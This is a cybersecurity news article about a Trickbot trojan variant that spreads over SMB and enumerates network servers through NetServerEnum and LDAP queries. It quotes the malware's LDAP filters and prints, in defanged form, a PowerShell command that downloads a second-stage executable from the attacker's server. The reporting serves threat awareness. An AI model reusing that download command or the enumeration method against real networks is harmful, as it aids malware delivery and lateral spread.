Friday, March 29, 2024

New Version of Trickbot Trojan Spread via Local SMB to Perform NetServer and LDAP Enumeration

A New version of Banking Trojan Trickbot Trojan “1000029″ Spreading Via new Module  “worm64Dll” via Email Champaign that imitates as an invoice of largest Financial Institution via Local SMB

It performs scanning to find the list of servers using  NetServerEnum Windows API that spread locally via Server Message Block (SMB).

it also has the ability to performing an Enumeration to others computer using  Lightweight Directory Access Protocol (LDAP) enumeration.

Previous SMB Vulnerability Exploit  Major Impact through WannaCry and Petya Ransomware Global Outbreak.

Also Read  Mobile Banking Malware “Svpeng” Working as a Keylogger and Steals Contacts and Call Logs

Trickbot Trojan Execution Flow

Initially, TrickBot trying to find a list of servers that running on the Network using NetServerEnum and scans LDAP resources.

Trickbot Trojan

Trickbot performing this action using “MachineFinder” and “netscan” functions and NetServerEnum helps to lists all servers of the specified type that are visible in a domain.

Flashpoint Researchers said, More specifically, the malware appears to enumerate all computers that are not domain controllers and resolve them to domains to IPs via gethostbyname and inet_ntoa Windows API.

Trickbot creates 2 queries to perform LDAP Enumeration.

• (objectCategory=computer)
• (&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))

it’s also the usage of the Python implementation of the SMB protocol “pysmb,”for querying the Windows 2007, Windows 7, Windows 2012, and Windows 8 Operating Systems (OS) that authentication via NT LM 0.12.

Finally, Trickbot malware communicate with C&C server that injects Powershell scripts and download another Trickbot Malware that name as setup[.]exe,”

Same as Wannacry Ransomware Outbreak, it scan external IPs for SMB connections.

Powershell Script that used to inject to Download another Malware.

powershell -Command “(New-Object Net.WebClient).DownloadFile(‘hxxp://c93211do[.]beget[.]tech/worm[.]bin[.]exe’, ‘setup[.]exe’)”

Trickbot Malware performs major impact with the various Financial institution in various countries and the main purpose of this malware infection to gain access the Local Area Network connection and acting as botnet and infection across the network.

Trickbot Malware also learning the methodology of biggest Global outbreak Ransomware Wannacry and Petya and replicate its Functions. Flashpoint said.

Also Read    Mobile Ransomware “LeakerLocker” Found in Play Store Apps that Encrypt and Send Personal Data on a Remote Server

Website

Latest articles

GoPlus’s Latest Report Highlights How Blockchain Communities Are Leveraging Critical API Security Data To Mitigate Web3 Threats

GoPlus Labs, the leading Web3 security infrastructure provider, has unveiled a groundbreaking report highlighting...

Wireshark 4.2.4 Released: What’s New!

Wireshark stands as the undisputed leader, offering unparalleled tools for troubleshooting, analysis, development, and...

Zoom Unveils AI-Powered All-In-One AI Work Workplace

Zoom has taken a monumental leap forward by introducing Zoom Workplace, an all-encompassing AI-powered...

iPhone Users Beware! Darcula Phishing Service Attacking Via iMessage

Phishing allows hackers to exploit human vulnerabilities and trick users into revealing sensitive information...

2 Chrome Zero-Days Exploited at Pwn2Own 2024: Patch Now

Google has announced a crucial update to its Chrome browser, addressing several vulnerabilities, including...

The Moon Malware Hacked 6,000 ASUS Routers in 72hours to Use for Proxy

Black Lotus Labs discovered a multi-year campaign by TheMoon malware targeting vulnerable routers and...
Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Mitigating Vulnerability Types & 0-day Threats

Mitigating Vulnerability & 0-day Threats

Alert Fatigue that helps no one as security teams need to triage 100s of vulnerabilities.

  • The problem of vulnerability fatigue today
  • Difference between CVSS-specific vulnerability vs risk-based vulnerability
  • Evaluating vulnerabilities based on the business impact/risk
  • Automation to reduce alert fatigue and enhance security posture significantly

Related Articles